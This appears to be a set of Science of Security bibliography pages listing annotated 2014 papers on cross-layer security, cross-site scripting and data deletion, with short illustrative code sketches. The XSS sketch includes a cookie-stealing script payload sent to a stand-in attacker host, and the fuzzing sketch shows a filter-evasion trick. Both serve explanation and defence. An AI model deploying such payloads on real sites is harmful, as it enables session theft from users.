One purpose of the Science of Security project is to look at the scholarly work that has been done over the past decades and determine how that work has contributed to our understanding of the underlying principles. The works cited here address the distinction between computing as a physical science and computing as an abstract science.

  • Peter Freeman, "Science, Computational Science, And Computer Science?," Journal of Computing Sciences in Colleges, Volume 29 Issue 3, January 2014, (Pages 5-6). (ID#:14-1550) Available at: http://dl.acm.org/citation.cfm?id=2544322.2544323&coll=DL&dl=GUIDE&CFID=476964903&CFTOKEN=21008126 This paper takes a look at the impact of computer science on furthering the ability to conduct science itself. In addition to examining the distinctions between science, computational science, and computer science, this paper recognizes the achievements in research and computation tools fostered by computer science. The author discusses theory formation, beyond just the contribution of tools, with a view to determining the essence of computer science. Keywords: (not available)
  • Subrata Dasgupta, It Began with Babbage: The Genesis of Computer Science, Oxford University Press, Inc. New York, NY, USA (c)2014 ISBN: 0199309418 9780199309412. (ID#:14-1551) Available at: http://dl.acm.org/citation.cfm?id=2582031&coll=DL&dl=GUIDE&CFID=476964903&CFTOKEN=21008126 This book, through a historical look at the advent of computer science since Charles Babbage in 1819, discusses the unique position of computer science within the classification of science, remarking that the subject spans both the physical and the abstract. The author argues that computer science does not adhere to the natural laws guiding fields like physics or chemistry, but rather concerns itself solely with the notion of purpose. The author draws from Babbage's Difference Engine, as well as early pioneers of what is now called computer science, including Ada Lovelace, Turing, and von Neumann.
  • Heilig, L.; Voß, S., "A Scientometric Analysis of Cloud Computing Literature," Cloud Computing, IEEE Transactions on, vol. PP, no.99, pp.1,1, April 2014. (ID#:14-1552) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6808484&isnumber=6562694 The popularity and rapid development of cloud computing in recent years has led to a huge amount of publications containing the achieved knowledge of this area of research. Due to the interdisciplinary nature and high relevance of cloud computing research, it becomes increasingly difficult or even impossible to understand the overall structure and development of this field without analytical approaches. While evaluating science has a long tradition in many fields, we identify a lack of a comprehensive scientometric study in the area of cloud computing. Based on a large bibliographic data base, this study applies scientometric means to empirically study the evolution and state of cloud computing research with a view from above the clouds. By this, we provide extensive insights into publication patterns, research impact and research productivity. Furthermore, we explore the interplay of related subtopics by analyzing keyword clusters. The results of this study provide a better understanding of patterns, trends and other important factors as a basis for directing research activities, sharing knowledge and collaborating in the area of cloud computing research.


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.



Cross Layer Security

Cross Layer Security


Protocol architectures traditionally followed strict layering principles to ensure interoperability, rapid deployment, and efficient implementation. But a lack of coordination between layers limits the performance of these architectures. More important, the lack of coordination may introduce security vulnerabilities and potential threat vectors. The literature cited here addresses the problems and opportunities available for cross layer security.

  • Datta, E.; Goyal, N., "Security Attack Mitigation Framework For The Cloud," Reliability and Maintainability Symposium (RAMS), 2014 Annual, vol., no., pp.1,6, 27-30 Jan. 2014. (ID#:14-1627) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798457&isnumber=6798433 Cloud computing brings in a lot of advantages for enterprise IT infrastructure; virtualization technology, which is the backbone of cloud, provides easy consolidation of resources, reduction of cost, space and management efforts. However, security of critical and private data is a major concern which still keeps back a lot of customers from switching over from their traditional in-house IT infrastructure to a cloud service. Existence of techniques to physically locate a virtual machine in the cloud, proliferation of software vulnerability exploits and cross-channel attacks in-between virtual machines, all of these together increases the risk of business data leaks and privacy losses. This work proposes a framework to mitigate such risks and engineer customer trust towards enterprise cloud computing. Everyday new vulnerabilities are being discovered even in well-engineered software products and the hacking techniques are getting sophisticated over time. In this scenario, absolute guarantee of security in enterprise wide information processing system seems a remote possibility; software systems in the cloud are vulnerable to security attacks. Practical solution for the security problems lies in well-engineered attack mitigation plan. At the positive side, cloud computing has a collective infrastructure which can be effectively used to mitigate the attacks if an appropriate defense framework is in place. We propose such an attack mitigation framework for the cloud. Software vulnerabilities in the cloud have different severities and different impacts on the security parameters (confidentiality, integrity, and availability). By using Markov model, we continuously monitor and quantify the risk of compromise in different security parameters (e.g.: change in the potential to compromise the data confidentiality). Whenever there is a significant change in risk, our framework would facilitate the tenants to calculate the Mean Time to Security Failure (MTTSF) of the cloud and allow them to adopt a dynamic mitigation plan. This framework is an add-on security layer in the cloud resource manager and it could improve the customer trust on enterprise cloud solutions. (A minimal MTTSF computation over an absorbing Markov chain is sketched after this list.) Keywords: Markov processes; cloud computing; security of data; virtualization; MTTSF cloud; Markov model; attack mitigation plan; availability parameter; business data leaks; cloud resource manager; cloud service; confidentiality parameter; cross-channel attacks; customer trust; enterprise IT infrastructure; enterprise cloud computing; enterprise cloud solutions; enterprise wide information processing system; hacking techniques; information technology; integrity parameter; mean time to security failure; privacy losses; private data security; resource consolidation; security attack mitigation framework; security guarantee; software products; software vulnerabilities; software vulnerability exploits; virtual machine; virtualization technology; Cloud computing; Companies; Security; Silicon; Virtual machining; Attack Graphs; Cloud computing; Markov Chain; Security; Security Administration
  • Bo Fu; Yang Xiao; Hongmei Deng; Hui Zeng, "A Survey of Cross-Layer Designs in Wireless Networks," Communications Surveys & Tutorials, IEEE, vol.16, no.1, pp.110,126, First Quarter 2014. (ID#:14-1628) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6587995&isnumber=6734841 The strict boundary of the five layers in the TCP/IP network model provides the information encapsulation that enables the standardizing of network communications and makes the implementation of networks convenient in terms of abstract layers. However, the encapsulation results in some side effects, including compromise of QoS, latency, extra overload, etc. Therefore, to mitigate the side effect of the encapsulation between the abstract layers in the TCP/IP model, a number of cross-layer designs have been proposed. Cross-layer designs allow information sharing among all of the five layers in order to improve the wireless network functionality, including security, QoS, and mobility. In this article, we classify cross-layer designs in two ways. First, by how information is shared among the five layers, cross-layer designs can be classified into two categories: the non-manager method and the manager method. Second, by the organization of the network, cross-layer designs can be classified into two categories: the centralized method and the distributed method. Furthermore, we summarize the challenges of the cross-layer designs, including coexistence, signaling, the lack of a universal cross-layer design, and the destruction of the layered architecture. Keywords: quality of service; radio networks; telecommunication security; transport protocols; QoS; TCP/IP network model; centralized method; cross-layer designs; distributed method; information encapsulation; manager method; mobility; network communications; security; wireless network functionality; IP networks; Information management; Physical layer; Protocols; Quality of service; Security; Wireless networks; Cross-layer design; security; wireless networks
  • Rieke, R.; Repp, J.; Zhdanova, M.; Eichler, J., "Monitoring Security Compliance of Critical Processes," Parallel, Distributed and Network-Based Processing (PDP), 2014 22nd Euromicro International Conference on , vol., no., pp.552,560, 12-14 Feb. 2014. (ID#:14-1629) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6787328&isnumber=6787236 Enforcing security in process-aware information systems at runtime requires the monitoring of systems' operation using process information. Analysis of this information with respect to security and compliance aspects is growing in complexity with the increase in functionality, connectivity, and dynamics of process evolution. To tackle this complexity, the application of models is becoming standard practice. Considering today's frequent changes to processes, model-based support for security and compliance analysis is not only needed in pre-operational phases but also at runtime. This paper presents an approach to support evaluation of the security status of processes at runtime. The approach is based on operational formal models derived from process specifications and security policies comprising technical, organizational, regulatory and cross-layer aspects. A process behavior model is synchronized by events from the running process and utilizes prediction of expected close-future states to find possible security violations and allow early decisions on countermeasures. The applicability of the approach is exemplified by a misuse case scenario from a hydroelectric power plant. Keywords: hydroelectric power stations; power system security; critical processes; hydroelectric power plant; model-based support; operational formal models; process behavior model; process specifications; process-aware information systems; security compliance; security policies; Automata; Business; Computational modeling; Monitoring; Predictive models; Runtime; Security; critical infrastructures; predictive security analysis; process behavior analysis; security information and event management; security modeling and simulation; security monitoring
  • Mendes, L.D.P.; Rodrigues, J.J.P.C.; Lloret, J.; Sendra, S., "Cross-Layer Dynamic Admission Control for Cloud-Based Multimedia Sensor Networks," Systems Journal, IEEE , vol.8, no.1, pp.235,246, March 2014. (ID#:14-1630) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6553353&isnumber=6740850 Cloud-based communications system is now widely used in many application fields such as medicine, security, environment protection, etc. Its use is being extended to the most demanding services like multimedia delivery. However, there are a lot of constraints when cloud-based sensor networks use the standard IEEE 802.15.3 or IEEE 802.15.4 technologies. This paper proposes a channel characterization scheme combined to a cross-layer admission control in dynamic cloud-based multimedia sensor networks to share the network resources among any two nodes. The analysis shows the behavior of two nodes using different network access technologies and the channel effects for each technology. Moreover, the existence of optimal node arrival rates in order to improve the usage of dynamic admission control when network resources are used is also shown. An extensive simulation study was performed to evaluate and validate the efficiency of the proposed dynamic admission control for cloud-based multimedia sensor networks. Keywords: IEEE standards; Zigbee; channel allocation; cloud computing; control engineering computing; multimedia communication; telecommunication congestion control; wireless sensor networks; channel characterization scheme; channel effects; cloud-based communications system; cloud-based sensor networks; cross-layer admission control; cross-layer dynamic admission control; dynamic cloud-based multimedia sensor networks; extensive simulation study; multimedia delivery; network access technology; network resources; optimal node arrival rates; standard IEEE 802.15.3 technology; standard IEEE 802.15.4 technology; Admission control; cloud computing; cross-layer design; multimedia communications ;sensor networks
  • Kumar, G.V.P.; Reddy, D.K., "An Agent Based Intrusion Detection System for Wireless Network with Artificial Immune System (AIS) and Negative Clone Selection," Electronic Systems, Signal Processing and Computing Technologies (ICESC), 2014 International Conference on, vol., no., pp.429,433, 9-11 Jan. 2014. (ID#:14-1631) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6745417&isnumber=6745317 Intrusion in a wireless network differs from that in an IP network in that wireless intrusion occurs at both the packet level and the signal level. Hence a wireless intrusion signature may be as simple as a changed MAC address or a jamming signal, or as complicated as session hijacking. Therefore merely managing and cross-verifying the patterns from an intrusion source is difficult in such a network. Besides the difficulty of detecting intrusion at different layers, network credentials vary from node to node due to factors like mobility, congestion, node failure and so on. Hence conventional techniques for intrusion detection fail to prevail in wireless networks. Therefore in this work we devise a unique agent-based technique to gather information from various nodes and use this information with an evolutionary artificial immune system to detect intrusion and prevent it by bypassing or delaying transmission over the intrusive paths. Simulation results show that the overhead of running the AIS system does not vary and is consistent under topological changes. The results also show that the proposed system is well suited for intrusion detection and prevention in wireless networks. Keywords: access protocols; artificial immune systems; jamming; packet radio networks; radio networks; security of data; AIS system; IP network; MAC address; agent based intrusion detection system; artificial immune system; jamming signal; negative clone selection; network topology; session hijacking; wireless intrusion signature; wireless network; Bandwidth; Delays; Immune system; Intrusion detection; Mobile agents; Wireless networks; Wireless sensor networks; AIS; congestion; intrusion detection; mobility
  • Tsai, J., "An Improved Cross-Layer Privacy-Preserving Authentication in WAVE-enabled VANETs," Communications Letters, IEEE, vol. PP, no.99, pp.1,1, May 2014. (ID#:14-1632) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814798&isnumber=5534602 In 2013, Biswas and Misic proposed a new privacy-preserving authentication scheme for WAVE-based vehicular ad hoc networks (VANETs), claiming that they used a variant of the Elliptic Curve Digital Signature Algorithm (ECDSA). However, our study has discovered that the authentication scheme proposed by them is vulnerable to a private key reveal attack. Any malicious receiving vehicle who receives a valid signature from a legal signing vehicle can gain access to the signing vehicle private key from the learned valid signature. Hence, the authentication scheme proposed by Biswas and Misic is insecure. We thus propose an improved version to overcome this weakness. The proposed improved scheme also supports identity revocation and trace. Based on this security property, the CA and a receiving entity (RSU or OBU) can check whether a received signature has been generated by a revoked vehicle. Security analysis is also conducted to evaluate the security strength of the proposed authentication scheme. Keywords: Authentication; Digital signatures; Elliptic curves; Law; Public key; Vehicles
  • Liang Hong, Wei Chen, "Information Theory And Cryptography Based Secured Communication Scheme For Cooperative MIMO Communication In Wireless Sensor Networks," Ad Hoc Networks, Volume 14, March, 2014, (Pages 95-105). (ID#:14-1633) Available at: http://dl.acm.org/citation.cfm?id=2580129.2580645&coll=DL&dl=GUIDE&CFID=376909966&CFTOKEN=69937197 A cross-layer secured communication approach is proposed as a solution to improve and secure wireless sensor network communication. The solution counters eavesdropping and active attacks from compromised nodes via layered cryptographic methods and key management: a cryptographic method is applied at higher network layers, coupled with data-assurance analysis at the physical layer, to bolster security in data transmission and receipt. The authors also propose an information-theory-based detector at the physical layer to detect actively compromised nodes and prompt the key management system to revoke their keys. Results of simulations are discussed.
  • Tobias Oder, Thomas Pöppelmann, Tim Güneysu, "Beyond ECDSA and RSA: Lattice-based Digital Signatures on Constrained Devices," DAC '14 Proceedings of the 51st Annual Design Automation Conference, June 2014, (Pages 1-6). (ID#:14-1634) Available at: http://dl.acm.org/citation.cfm?id=2593069.2593098&coll=DL&dl=GUIDE&CFID=376909966&CFTOKEN=69937197 This paper argues the inadequacy of currently used asymmetric cryptography in the face of practical quantum computing. Recognizing the need for alternatives, particularly for systems with long-term security requirements, such as aviation and automobiles, the authors propose lattice-based cryptography as a sustainable solution. The authors present an implementation of BLISS, a post-quantum secure signature scheme, which this paper shows significantly improves signing and verification. Keywords: (not provided)
  • Ana Nieto, Javier Lopez, "A Model for the Analysis of QoS and Security Tradeoff in Mobile Platforms," Mobile Networks and Applications, Volume 19 Issue 1, February 2014, (Pages 64-78). (ID#:14-1635) Available at: http://dl.acm.org/citation.cfm?id=2582353.2582359&coll=DL&dl=GUIDE&CFID=376909966&CFTOKEN=69937197 This paper addresses the popular, widespread use of mobile devices, and the conflicting security and quality of service (QoS) requirements which accompany mobile platform usage. The authors of this paper propose a Parametric Relationship Model (PRM), to determine Security and QoS correlation. Increased usability, security, and efficiency for mobile platforms are considered in terms of the Future Internet.
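
The first citation in this list quantifies risk with a Markov model and a Mean Time To Security Failure (MTTSF). The sketch below shows the textbook computation of mean time to absorption in a small absorbing Markov chain via the fundamental matrix $N = (I - Q)^{-1}$; the three-state chain, its transition probabilities, and the monitoring interval are invented for illustration and are not taken from the paper.

    import numpy as np

    # Transition matrix over states [Healthy, Degraded, Failed];
    # "Failed" is absorbing. Probabilities are illustrative only.
    P = np.array([[0.90, 0.08, 0.02],
                  [0.20, 0.70, 0.10],
                  [0.00, 0.00, 1.00]])

    Q = P[:2, :2]                       # transitions among transient states
    N = np.linalg.inv(np.eye(2) - Q)    # fundamental matrix
    steps = N @ np.ones(2)              # expected steps to absorption per start state

    STEP_HOURS = 1.0                    # length of one monitoring interval (assumed)
    print(f"MTTSF from Healthy:  {steps[0] * STEP_HOURS:.1f} h")
    print(f"MTTSF from Degraded: {steps[1] * STEP_HOURS:.1f} h")

In a framework like the one described above, the transition probabilities would be re-estimated as new vulnerabilities are discovered, and a significant drop in MTTSF would trigger a revised mitigation plan.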

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Cross Site Scripting

Cross Site Scripting


A type of computer security vulnerability typically found in Web applications, cross-site scripting (XSS) enables attackers to inject client-side script into Web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy. Consequences may range from petty nuisance to significant security risk, depending on the value of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner. Because XSS is a frequent method of attack, research is being conducted on methods to prevent, detect, and mitigate XSS attacks.
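
As a concrete illustration of the flaw, the minimal sketch below contrasts interpolating untrusted input directly into HTML with escaping it first. Output escaping is only one mitigation among several studied in the citations that follow, and the payload is a deliberately simple example.

    import html

    untrusted = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

    # Vulnerable: the payload is emitted verbatim and runs in the victim's browser.
    vulnerable_page = "<p>Hello, " + untrusted + "</p>"

    # Mitigated: HTML metacharacters are escaped, so the payload renders as inert text.
    safe_page = "<p>Hello, " + html.escape(untrusted) + "</p>"

    print(safe_page)
    # <p>Hello, &lt;script&gt;document.location=&quot;http://evil.example/?c=&quot;+document.cookie&lt;/script&gt;</p>

Real applications must escape for the specific context (HTML body, attribute, URL, JavaScript) into which data is written, which is exactly why the filters probed by the XSS vector suites below are so easy to get wrong.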

  • Abgrall, Erwan; Traon, Yves Le; Gombault, Sylvain; Monperrus, Martin, "Empirical Investigation of the Web Browser Attack Surface under Cross-Site Scripting: An Urgent Need for Systematic Security Regression Testing," Software Testing, Verification and Validation Workshops (ICSTW), 2014 IEEE Seventh International Conference on , vol., no., pp.34,41, March 31 2014-April 4 2014. (ID#:14-1636) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6825636&isnumber=6825623 One of the major threats against web applications is Cross-Site Scripting (XSS). The final target of XSS attacks is the client running a particular web browser. During this last decade, several competing web browsers (IE, Netscape, Chrome, Firefox) have evolved to support new features. In this paper, we explore whether the evolution of web browsers is done using systematic security regression testing. Beginning with an analysis of their current exposure degree to XSS, we extend the empirical study to a decade of most popular web browser versions. We use XSS attack vectors as unit test cases and we propose a new method supported by a tool to address this XSS vector testing issue. The analysis on a decade releases of most popular web browsers including mobile ones shows an urgent need of XSS regression testing. We advocate the use of a shared security testing benchmark as a good practice and propose a first set of publicly available XSS vectors as a basis to ensure that security is not sacrificed when a new version is delivered. Keywords: Browsers; HTML; Mobile communication; Payloads; Security; Testing; Vectors; XSS; browser; regression; security; testing; web
  • Bozic, Josip; Wotawa, Franz, "Security Testing Based on Attack Patterns," Software Testing, Verification and Validation Workshops (ICSTW), 2014 IEEE Seventh International Conference on , vol., no., pp.4,11, March 31 2014-April 4 2014. (ID#:14-1637) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6825631&isnumber=6825623 Testing for security related issues is an important task of growing interest due to the vast amount of applications and services available over the internet. In practice testing for security often is performed manually with the consequences of higher costs, and no integration of security testing with today's agile software development processes. In order to bring security testing into practice, many different approaches have been suggested including fuzz testing and model-based testing approaches. Most of these approaches rely on models of the system or the application domain. In this paper we suggest to formalize attack patterns from which test cases can be generated and even executed automatically. Hence, testing for known attacks can be easily integrated into software development processes where automated testing, e.g., for daily builds, is a requirement. The approach makes use of UML state charts. Besides discussing the approach, we illustrate the approach using a case study. Keywords: Adaptation models; Databases; HTML; Security; Software; Testing; Unified modeling language; Attack pattern; SQL injection; UML state machine; cross-site scripting; model-based testing; security testing
  • Aydin, Abdulbaki; Alkhalaf, Muath; Bultan, Tevfik, "Automated Test Generation from Vulnerability Signatures," Software Testing, Verification and Validation (ICST), 2014 IEEE Seventh International Conference on, vol., no., pp.193,202, March 31 2014-April 4 2014. (ID#:14-1638) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6823881&isnumber=6823846 Web applications need to validate and sanitize user inputs in order to avoid attacks such as Cross Site Scripting (XSS) and SQL Injection. Writing string manipulation code for input validation and sanitization is an error-prone process leading to many vulnerabilities in real-world web applications. Automata-based static string analysis techniques can be used to automatically compute vulnerability signatures (represented as automata) that characterize all the inputs that can exploit a vulnerability. However, there are several factors that limit the applicability of static string analysis techniques in general: 1) undecidability of static string analysis requires the use of approximations, leading to false positives; 2) static string analysis tools do not handle all string operations; 3) the dynamic nature of scripting languages makes static analysis difficult. In this paper, we show that vulnerability signatures computed for deliberately insecure web applications (developed for demonstrating different types of vulnerabilities) can be used to generate test cases for other applications. Given a vulnerability signature represented as an automaton, we present algorithms for test case generation based on state, transition, and path coverage. These automatically generated test cases can be used to test applications that are not analyzable statically, and to discover attack strings that demonstrate how the vulnerabilities can be exploited. Keywords: automata-based test generation; string analysis; validation and sanitization; vulnerability signatures
  • Erwan Abgrall, Yves Le Traon, Sylvain Gombault, Martin Monperrus, "Empirical Investigation of the Web Browser Attack Surface under Cross-Site Scripting: An Urgent Need for Systematic Security Regression Testing," ICSTW '14 Proceedings of the 2014 IEEE International Conference on Software Testing, Verification, and Validation Workshops, March 2014, (Pages 34-41). (ID#:14-1639) Available at: http://dl.acm.org/citation.cfm?id=2624300.2624420&coll=DL&dl=GUIDE&CFID=479068957&CFTOKEN=54071302 This publication distinguishes Cross-Site Scripting (XSS) as a significant threat to web applications. The authors of this publication discuss advancements in several web browsers (IE, Netscape, Chrome, Firefox), and attempt to determine if systematic security regression testing was used. The browsers are evaluated on their current vulnerability to XSS, followed by an assessment using XSS attack vectors as test cases. Results indicate that XSS regression testing should be applied immediately to popularly used web browsers, including mobile browsers. The authors strongly recommend regular use of a shared security testing benchmark, and promote a set of baseline XSS vectors, available for public use.
  • Ben Stock, Martin Johns, "Protecting Users Against XSS-Based Password Manager Abuse," ASIA CCS '14 Proceedings of the 9th ACM Symposium On Information, Computer And Communications Security, June 2014, (Pages 183-194). (ID#:14-1640) Available at: http://dl.acm.org/citation.cfm?id=2590296.2590336&coll=DL&dl=GUIDE&CFID=479068957&CFTOKEN=54071302 This paper highlights the vulnerability concern with password managers. Intended to alleviate the tediousness of password authentication, password managers automatically supply previously-entered passwords in web pages. This creates opportunities for Cross-Site Scripting attacks, as password managers insert passwords into pages in clear text, where they can be obtained by JavaScript. The paper offers a survey of password-field characteristics relevant to current password manager functionality. The authors then present an alternative password manager architecture, which defends against the identified attacks.
  • M. I. P. Salas, E. Martins, "Security Testing Methodology for Vulnerabilities Detection of XSS in Web Services and WS-Security," Electronic Notes in Theoretical Computer Science (ENTCS) archive Volume 302, February, 2014, (Pages 133-154). (ID#:14-1641) Available at: http://dl.acm.org/citation.cfm?id=2583134.2583367&coll=DL&dl=GUIDE&CFID=479068957&CFTOKEN=54071302 The authors of this paper highlight existing Web services vulnerability to Cross-Site Scripting attacks (XSS). With a view to bolster XSS vulnerability detection, the authors propose utilizing Penetration Testing and Fault Injection to simulate XSS attacks. Coupled with WS-Security (WSS) and Security Tokens, this simulation method allows for identification of sender, enabling legitimate access control to communication exchange. Results indicate that WSInject, the tested fault injection tool, can be successfully used to detect XSS attack vulnerability.
  • Fabien Duchene, Sanjay Rawat, Jean-Luc Richier, Roland Groz, "KameleonFuzz: Evolutionary Fuzzing For Black-Box XSS Detection," CODASPY '14 Proceedings of the 4th ACM conference on Data and Application Security And Privacy, March 2014, (Pages 37-48). (ID#:14-1642) Available at: http://dl.acm.org/citation.cfm?id=2557547.2557550&coll=DL&dl=GUIDE&CFID=479068957&CFTOKEN=54071302 This paper addresses the concept of fuzz testing, the automated generation and deployment of malformed inputs to a web application, so that a vulnerability or bug may be discovered. The authors of this publication propose KameleonFuzz, a black-box Cross-Site Scripting (XSS) web application fuzzer that can propagate malicious inputs, as well as report its proximity to exposing a vulnerability. A double taint inference allows for notification of successful or unsuccessful exploitation attempts.
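
The last citation describes evolutionary fuzzing. As generic background, the loop below is the bare skeleton of mutation-based fuzzing against a sanitizer: mutate a seed, run the target, and check whether script-capable markup survives. The mutation operators and the toy case-sensitive "sanitizer" are invented for illustration and are far simpler than KameleonFuzz's taint-aware, genetic-algorithm-driven search.

    import random

    SEEDS = ['<script>alert(1)</script>', '"><img src=x onerror=alert(1)>']

    def mutate(s):
        """Apply one random mutation (assumed operators, illustrative)."""
        ops = [
            lambda t: t.replace('script', 'scr<script>ipt'),  # filter-evasion split
            lambda t: t.upper(),                              # case flipping
            lambda t: t + random.choice(['>', '"', "'"]),     # delimiter append
        ]
        return random.choice(ops)(s)

    def weak_sanitizer(s):
        """Toy target: removes lowercase '<script>' and '</script>' substrings (single pass)."""
        return s.replace('<script>', '').replace('</script>', '')

    def fuzz(rounds=1000):
        for _ in range(rounds):
            candidate = mutate(random.choice(SEEDS))
            out = weak_sanitizer(candidate)
            if '<script>' in out.lower() or 'onerror=' in out.lower():
                return candidate  # an input whose "sanitized" form still scripts
        return None

    print(fuzz())

Note how the first operator defeats the strip filter: removing the inner '<script>' from '<scr<script>ipt>' reassembles the outer tag, a classic evasion that real fuzzers rediscover automatically.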

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Data Deletion and Forgetting

Data Deletion and Forgetting


A recent court decision has focused attention on the problem of "forgetting," that is, eliminating links and references on the Internet that point to a specific topic or person. "Forgetting," essentially a problem in data deletion, has many implications for security and for data structures. Interestingly, the reviewers found relatively few scholarly articles addressing the problem, from either a technical or a governance viewpoint. Articles published in the first six months of 2014 are cited here.

  • D'Orazio, C.; Ariffin, A.; Choo, K.-K.R., "iOS Anti-forensics: How Can We Securely Conceal, Delete and Insert Data?," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.4838,4847, 6-9 Jan. 2014. (ID#:14-1553) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6759196&isnumber=6758592 With increasing popularity of smart mobile devices such as iOS devices, security and privacy concerns have emerged as a salient area of inquiry. A relatively under-studied area is anti-mobile forensics to prevent or inhibit forensic investigations. In this paper, we propose a "Concealment" technique to enhance the security of non-protected (Class D) data that is at rest on iOS devices, as well as a "Deletion" technique to reinforce data deletion from iOS devices. We also demonstrate how our "Insertion" technique can be used to insert data into iOS devices surreptitiously that would be hard to pick up in a forensic investigation. Keywords: data privacy; digital forensics; iOS (operating system);mobile computing; mobile handsets; antimobile forensics; concealment technique; data deletion; deletion technique; forensic investigations; iOS antiforensics; iOS devices; insertion technique; nonprotected data security; privacy concerns; security concerns ;smart mobile devices; Cryptography; File systems; Forensics; Mobile handsets; Random access memory; Videos; iOS anti-forensics; iOS forensics; mobile anti-forensics; mobile forensics
  • Khanduja, V.; Chakraverty, S.; Verma, O.P.; Tandon, R.; Goel, S., "A Robust Multiple Watermarking Technique For Information Recovery," Advance Computing Conference (IACC), 2014 IEEE International, vol., no., pp.250,255, 21-22 Feb. 2014. (ID#:14-1554) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779329&isnumber=6779283 Digital databases serve as the vehicles for compiling, disseminating and utilizing all forms of information that are pivotal for societal development. A major challenge that needs to be tackled is to recover crucial information that may be lost due to malicious attacks on database integrity. In the domain of digital watermarking, past research has focused on robust watermarking for establishing database ownership and fragile watermarking for tamper detection. In this paper, we propose a new technique for multiple watermarking of relational databases that provides a unified solution to two major security concerns: ownership identification and information recovery. In order to resolve ownership conflicts a secure watermark is embedded using a secret key known only to the database owner. Another watermark encapsulates granular information on user-specified crucial attributes in a manner such that the perturbed or lost data can be regenerated conveniently later. Theoretical analysis shows that the probability of successful regeneration of tampered/lost data improves dramatically as we increase the number of candidate attributes for embedding the watermark. We experimentally verify that the proposed technique is robust enough to extract the watermark accurately even after 100% tuple addition or alteration and after 98% tuple deletion. (A minimal keyed bit-embedding step in this style is sketched after this list.) Keywords: feature extraction; granular computing; image watermarking; relational databases; security of data; visual databases; database integrity; database ownership; digital databases; digital watermarking; fragile watermarking; granular information; information recovery; malicious attacks; relational databases; robust multiple watermarking technique; societal development; tamper detection; tuple deletion; watermark extraction; Clustering algorithms; Conferences; Relational databases; Robustness; Watermarking; Data Recovery; Digital Watermarking; Right Protection; Robustness; Tamper Detection
  • Raluca Ada Popa, Emily Stark, Jonas Helfer, Steven Valdez, Nickolai Zeldovich, M. Frans Kaashoek, Hari Balakrishnan, "Building Web Applications On Top Of Encrypted Data Using Mylar," NSDI'14 Proceedings of the 11th USENIX Conference on Networked Systems Design and Implementation, April 2014, (Pages 157-172). (ID#:14-1555) Available at: https://www.usenix.org/system/files/conference/nsdi14/nsdi14-paper-popa.pdf?CFID=474579018&CFTOKEN=48044888 This paper discusses the potential security threats in storing private information on web application servers, as they may be accessed by those who gain entry to the server. The authors present the concept of Mylar, a web application-building platform that encrypts sensitive data stored on servers. Mylar is designed to fully protect private data against attackers, even in the event of complete malicious access to servers. With encrypted data stored on servers, Mylar decrypts the data solely in user browsers. The server can perform keyword searches over encrypted documents, even when the documents are encrypted with different keys.
  • Michael Beiter, Marco Casassa Mont, Liqun Chen, Siani Pearson, "End-to-end Policy Based Encryption Techniques For Multi-Party Data Management," Computer Standards & Interfaces, Volume 36 Issue 4, June, 2014, (Pages 689-703). (ID#:14-1556) Available at: http://dl.acm.org/citation.cfm?id=2588915.2589305&coll=DL&dl=GUIDE&CFID=474579018&CFTOKEN=48044888 This publication centers on privacy and accountability concerns in cloud computing applications. The authors in this paper propose a solution that utilizes machine readable policies to define usage as data communicates between numerous parties. Independent third parties help adhere service providers to limited data access as defined by aforementioned policies, as well as to confirm policy compliance before dispensing requested decryption keys.
  • Bin Luo, Jingbo Xia, "A Novel Intrusion Detection System Based On Feature Generation With Visualization Strategy," Expert Systems with Applications: An International Journal, Volume 41 Issue 9, July, 2014, (Pages 4139-4147). (ID#:14-1557) Available at: http://dl.acm.org/citation.cfm?id=2588899.2588995&coll=DL&dl=GUIDE&CFID=474579018&CFTOKEN=48044888 The authors of this publication present FASVFG, a four-angle-star-based visualized feature generation approach. The goal of FASVFG is to assess the difference in sample distances in a 5-class classification case. Numerical features are developed and applied to KDDcup99 network visit data, based on the four-angle-star image. Keywords: Feature generation, Intrusion detection system, Visualization
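
The second citation in this list embeds watermark bits in selected attributes of selected tuples. The sketch below shows the classic keyed least-significant-bit marking step that this line of relational-database watermarking builds on (in the style of Agrawal and Kiernan); the key, marking fraction, and data are invented for illustration, and the paper's scheme additionally encapsulates recovery information for user-specified attributes.

    import hashlib
    import hmac

    SECRET_KEY = b"owner-secret-key"   # known only to the database owner (assumed)
    GAMMA = 3                          # mark roughly one tuple in GAMMA

    def keyed_hash(primary_key):
        """Keyed, deterministic hash of a tuple's primary key."""
        digest = hmac.new(SECRET_KEY, str(primary_key).encode(), hashlib.sha256).digest()
        return int.from_bytes(digest[:8], "big")

    def watermark(rows):
        """rows: list of (primary_key, numeric_value) pairs; returns a marked copy.

        The keyed hash decides which tuples carry a mark and which bit value
        is forced into the attribute's least-significant bit, so the owner can
        later recompute the same positions to verify ownership."""
        marked = []
        for pk, value in rows:
            h = keyed_hash(pk)
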